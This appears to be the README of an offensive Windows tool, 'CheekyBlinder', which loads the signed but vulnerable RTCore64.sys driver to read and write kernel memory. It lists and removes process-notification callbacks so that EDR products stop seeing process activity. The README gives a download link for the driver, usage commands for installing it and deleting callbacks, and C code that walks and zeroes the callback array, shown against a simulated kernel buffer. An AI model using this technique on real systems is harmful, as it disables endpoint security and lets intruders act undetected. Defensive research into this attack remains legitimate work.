Enumerating and removing kernel callbacks using signed vulnerable drivers
Accompanying blog post: https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
WARNING: this program reads and writes kernel memory through a vulnerable driver and may cause BSODs; run at your own risk.
The vulnerable driver (RTCore64.sys, shipped with MSI Afterburner) can be downloaded from http://download-eu2.guru3d.com/afterburner/%5BGuru3D.com%5D-MSIAfterburnerSetup462Beta2.zip
Lots of code re-used from:
Should build fine on VS2019; build for x64 only.
Run elevated. Arguments and examples:
cheekyblinder.exe /process: lists the current process notification callbacks present on the system
cheekyblinder.exe /delprocess <address>: removes the callback at <address> (use the address from the output of /process)
cheekyblinder.exe /installDriver: installs the driver RTCore64.sys (place RTCore64.sys in the same folder as the executable)
cheekyblinder.exe /uninstallDriver: removes the driver
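What /process and /delprocess have to do with the values they read back from the kernel, as an added example that is not CheekyBlinder's own code. The constructed fake_kernel buffer, the sample addresses and the kread64/kwrite64 helpers stand in for the driver's read/write primitive (in the real tool those are DeviceIoControl round-trips to RTCore64.sys, and the array address still has to be located, which is what the TODO about pattern searching refers to). The x64 layout the walk relies on is that each slot of PspCreateProcessNotifyRoutine is an EX_FAST_REF (low 4 bits are reference-count bits) pointing at an EX_CALLBACK_ROUTINE_BLOCK whose routine pointer sits at offset 8; zeroing the slot as the removal step is an assumption about how /delprocess works, and on a live system a slot the kernel is currently using is exactly where a BSOD comes from.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x64 layout: 64 slots, each an EX_FAST_REF whose low 4 bits are refcount bits
 * and whose remaining bits point at an EX_CALLBACK_ROUTINE_BLOCK
 * (rundown ref at +0, notify routine at +8, context at +16). */
#define PSP_MAX_CALLBACKS        64
#define EX_FAST_REF_MASK         0xFULL
#define CALLBACK_FUNCTION_OFFSET 8

/* Constructed stand-in for kernel memory; the real tool reads/writes it via the driver. */
#define KBASE 0xFFFFF80010000000ULL
#define KSIZE 0x4000

struct fake_kernel {
    uint64_t base;
    uint8_t  mem[KSIZE];
};

static int kaddr_ok(const struct fake_kernel *k, uint64_t addr)
{
    return addr >= k->base && addr + 8 <= k->base + KSIZE;
}

uint64_t kread64(const struct fake_kernel *k, uint64_t addr)
{
    uint64_t v = 0;
    if (!kaddr_ok(k, addr))
        return 0;                       /* unmapped: treat as empty rather than fault */
    memcpy(&v, k->mem + (addr - k->base), sizeof v);
    return v;
}

int kwrite64(struct fake_kernel *k, uint64_t addr, uint64_t v)
{
    if (!kaddr_ok(k, addr))
        return 0;
    memcpy(k->mem + (addr - k->base), &v, sizeof v);
    return 1;
}

struct callback_entry {
    int      slot;       /* index in the array */
    uint64_t slot_addr;  /* address of the array slot, the thing removal overwrites */
    uint64_t block;      /* EX_CALLBACK_ROUTINE_BLOCK with refcount bits cleared */
    uint64_t function;   /* the registered notify routine */
};

/* Walk the array: skip empty slots, mask the EX_FAST_REF bits, read the routine pointer. */
size_t enumerate_process_callbacks(const struct fake_kernel *k, uint64_t array_addr,
                                   struct callback_entry *out, size_t max_out)
{
    size_t n = 0;
    for (int i = 0; i < PSP_MAX_CALLBACKS && n < max_out; i++) {
        uint64_t slot_addr = array_addr + (uint64_t)i * sizeof(uint64_t);
        uint64_t raw = kread64(k, slot_addr);
        if (raw == 0)
            continue;
        uint64_t block = raw & ~EX_FAST_REF_MASK;
        out[n].slot      = i;
        out[n].slot_addr = slot_addr;
        out[n].block     = block;
        out[n].function  = kread64(k, block + CALLBACK_FUNCTION_OFFSET);
        n++;
    }
    return n;
}

/* Remove the callback whose routine address matches by zeroing its array slot
 * (assumption: the kernel skips NULL slots). Returns 1 if a slot was written. */
int remove_process_callback(struct fake_kernel *k, uint64_t array_addr, uint64_t function)
{
    struct callback_entry entries[PSP_MAX_CALLBACKS];
    size_t n = enumerate_process_callbacks(k, array_addr, entries, PSP_MAX_CALLBACKS);
    for (size_t i = 0; i < n; i++)
        if (entries[i].function == function)
            return kwrite64(k, entries[i].slot_addr, 0);
    return 0;                           /* no such callback: nothing written */
}

/* Constructed sample: two registered routines, in slots 0 and 5, with refcount bits set. */
#define SAMPLE_ARRAY   (KBASE + 0x1000)
#define SAMPLE_BLOCK_A (KBASE + 0x2000)
#define SAMPLE_BLOCK_B (KBASE + 0x2100)
#define SAMPLE_FUNC_A  0xFFFFF80011223340ULL   /* hypothetical EDR driver routine */
#define SAMPLE_FUNC_B  0xFFFFF80011334450ULL   /* hypothetical second routine */

void build_sample_kernel(struct fake_kernel *k)
{
    memset(k, 0, sizeof *k);
    k->base = KBASE;
    kwrite64(k, SAMPLE_BLOCK_A + CALLBACK_FUNCTION_OFFSET, SAMPLE_FUNC_A);
    kwrite64(k, SAMPLE_BLOCK_B + CALLBACK_FUNCTION_OFFSET, SAMPLE_FUNC_B);
    kwrite64(k, SAMPLE_ARRAY + 0 * 8, SAMPLE_BLOCK_A | 0x3);
    kwrite64(k, SAMPLE_ARRAY + 5 * 8, SAMPLE_BLOCK_B | 0x7);
}

int main(void)
{
    static struct fake_kernel k;
    struct callback_entry e[PSP_MAX_CALLBACKS];
    build_sample_kernel(&k);
    size_t n = enumerate_process_callbacks(&k, SAMPLE_ARRAY, e, PSP_MAX_CALLBACKS);
    for (size_t i = 0; i < n; i++)
        printf("slot %2d @ 0x%" PRIx64 ": block 0x%" PRIx64 " -> routine 0x%" PRIx64 "\n",
               e[i].slot, e[i].slot_addr, e[i].block, e[i].function);
    printf("removed: %d\n", remove_process_callback(&k, SAMPLE_ARRAY, SAMPLE_FUNC_A));
    printf("remaining: %zu\n", enumerate_process_callbacks(&k, SAMPLE_ARRAY, e, PSP_MAX_CALLBACKS));
    return 0;
}
```

The routine address printed per slot is what you would resolve against loaded module ranges to tell an EDR's callback from the kernel's own, and it is the value /delprocess takes back as its argument; the slot address is what actually gets overwritten.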
I'll add more callbacks when I have time.
Use the mimikatz pattern search to find the array rather than hacky offsets. PRs welcome.